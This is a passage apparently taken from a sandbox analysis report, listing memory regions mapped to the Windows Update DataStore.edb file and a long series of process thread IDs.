mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3474 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3475 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Thread: id = 125 os_tid = 0x708 Thread: id = 126 os_tid = 0x700 Thread: id = 127 os_tid = 0x6f4 Thread: id = 128 os_tid = 0x6f0 Thread: id = 129 os_tid = 0x6ec Thread: id = 130 os_tid = 0x6e4 Thread: id = 131 os_tid = 0x6e0 Thread: id = 132 os_tid = 0x6d4 Thread: id = 133 os_tid = 0x6bc Thread: id = 134 os_tid = 0x6ac Thread: id = 135 os_tid = 0x650 Thread: id = 136 os_tid = 0x640 Thread: id = 137 os_tid = 0x60c Thread: id = 138 os_tid = 0x604 Thread: id = 139 os_tid = 0x600 Thread: id = 140 os_tid = 0x5fc Thread: id = 141 os_tid = 0x5f0 Thread: id = 142 os_tid = 0x5ec Thread: id = 143 os_tid = 0x5e8 Thread: id = 144 os_tid = 0x5e0 Thread: id = 145 os_tid = 0x5cc Thread: id = 146 os_tid = 0x5c4 Thread: id = 147 os_tid = 0x5bc Thread: id = 148 os_tid = 0x5b8 Thread: id = 149 os_tid = 0x5b4 Thread: id = 150 os_tid = 0x584 Thread: id = 151 os_tid = 0x574 Thread: id = 152 os_tid = 0x460 Thread: id = 153 os_tid = 0x440 Thread: id = 154 os_tid = 0x43c Thread: id = 155 os_tid = 0x414 Thread: id = 156 os_tid = 0x298 Thread: id = 157 os_tid = 0x438 Thread: id = 158 os_tid = 0x434 Thread: id = 159 os_tid = 0x42c Thread: id = 160 os_tid = 0x404 Thread: id = 161 os_tid = 0x138 Thread: id = 162 os_tid = 0x3ec Thread: id = 163 os_tid = 0x3d8 Thread: id = 164 os_tid = 0x3c0 Thread: id = 165 os_tid = 0x3bc Thread: id = 166 os_tid = 0x370 Thread: id = 167 os_tid = 0x36c Thread: id = 168 os_tid = 0x368 Thread: id = 169 os_tid = 0x364 Thread: id = 170 os_tid = 0x360 Thread: id = 171 os_tid = 0x35c Thread: id = 175 os_tid = 0x630 Thread: id = 176 os_tid = 0x4f4 Thread: id = 177 os_tid = 0x4e8 Thread: id = 178 os_tid = 0x348 Thread: id = 179 os_tid = 0x78c Thread: id = 180 os_tid = 0x788 Thread: id = 181 os_tid = 0x6f0 Thread: id = 182 os_tid = 0x6f4 Thread: id = 183 os_tid = 0x6e4 Thread: id = 184 os_tid = 0x6e0 Thread: id = 185 os_tid = 0x7c4 Thread: id = 186 os_tid = 0x7f8 Thread: id = 187 os_tid = 0x420 Thread: id = 188 os_tid = 0x7c0 Thread: id = 189 os_tid = 0x79c Thread: id = 190 os_tid = 0x200 Thread: id = 191 os_tid = 0x240 Thread: id = 192 os_tid = 0x238 Thread: id = 193 os_tid = 0x2a4 Thread: id = 194 os_tid = 0x1bc Thread: id = 195 os_tid = 0x104 Thread: id = 196 os_tid = 0x300 Thread: id = 197 os_tid = 0x1f8 Thread: id = 198 os_tid = 0x41c Thread: id = 199 os_tid = 0x220